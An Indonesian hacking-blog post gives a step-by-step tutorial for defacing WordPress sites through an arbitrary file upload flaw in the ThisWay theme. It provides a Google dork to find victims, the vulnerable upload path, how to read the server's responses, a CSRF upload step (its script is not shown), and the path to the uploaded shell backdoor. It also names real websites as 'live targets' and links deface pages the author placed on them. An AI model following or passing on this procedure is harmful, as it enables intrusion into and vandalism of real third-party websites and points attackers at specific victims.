Cara Deface Wordpress ThisWay Arbitrary File Upload + Live Target

Oke Gan Selamat Datang Kembali di Blog JIC-Team hehehe Udh lama Nih Mimin Gak UPDATE tentang Tutorial Khusus nya Dalam DEFACE .. ^_^ Lanjut saja Simak Tutorial di bawah ya


Bahan :
1.DORK
2.Exploit
3.CSRF

Eksekusi Selanjutnya

1.Pertama masukan dork ini di kolom mesin pencarian google/search engine
- inurl:/wp-content/themes/ThisWay/ site:com <= Bisa di kembangin Lagi Biar dapet yg FRESS Gan 

2.Lalu masukan exploit ini : "/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"

- example :
http://target.com/[patch]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3.Apabila keluar tulisan seperti ini {"status":"NOK","ERR":"This file is incorect"} atau Blank kemungkinan besar website tersebut Vuln. namun apabila keluar Error 404 dan sebagainya berarti tidak vuln Gan :v

4.Lalu pastekan script berikut di notepad, lalu save dengan ekstensi .html
script CSRF 

5.Nanti keluar result/tulisan seperti ini : {"status":"OK","imageID":12,"imageName":"settingimage_namarandomnameshell.php"}

Bila tidak nongol tulisan kaya gitu, cari target lain

6.Akses shell backdoor kalian di
- http://www.target.com/wp-content/uploads/[tahun]/[bulan]/settingsimage_randomnameshell.php

Example :
- http://target.com/wp-content/uploads/2016/09/settingsimage_c99326667788.php

Nih mimin Kasih Live Target Gan .. Jangan di rusak Yak Live Target Nya :D

-http://www.jasminecastillo.com/
-http://thenineyard.com

Nih Juga Hasil Saya Gan :

http://h2ophotographics.com/list.htm
http://www.jasminecastillo.com/wp-content/uploads/2017/08/settingsimage_BDUV6XdGGHf35LVD.htm
 http://thenineyard.com/wp-content/uploads/2017/08/settingsimage_VCQZmDBNPVGRUlEk.htm
http://www.beautyandhair.com.mx/wp-content/uploads/2017/08/settingsimage_EG0d1lfMcSefPM2K.htm


Sekian Tutorial kali ini Gan Semoga bermanfaat ^_^... Bagi Yg Mau CopAS Mohon Di Kasih SUmber nya Gan Trimakasih ;)

By ./51N1CH1
 

Posted in: Hacking